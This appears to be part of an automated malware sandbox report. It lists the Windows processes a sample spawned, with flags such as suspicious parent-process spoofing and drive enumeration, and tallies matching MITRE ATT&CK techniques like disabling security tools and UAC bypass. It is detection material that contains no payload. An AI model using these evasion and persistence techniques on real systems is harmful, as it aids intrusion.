[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 6460 -ip 6460
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID: 7676

[1] C:\Windows\System32\svchost.exe
    Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
    PID: 3128

[1] C:\Windows\system32\msiexec.exe
    Command line: C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    PID: 7028

[2] C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 70BB7CD0850E1E41029D67F6D2651FCF C
    PID: 4872

[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
    PID: 9200
Network

MITRE ATT&CK Enterprise v6 (technique: number of matching signatures)

Persistence
  Modify Existing Service: 3
  Registry Run Keys / Startup Folder: 2
  Scheduled Task: 1
  Winlogon Helper DLL: 1

Defense Evasion
  Bypass User Account Control: 1
  Disabling Security Tools: 5
  Impair Defenses: 1
  Install Root Certificate: 1
  Modify Registry: 10
  Virtualization/Sandbox Evasion: 1
  Web Service: 1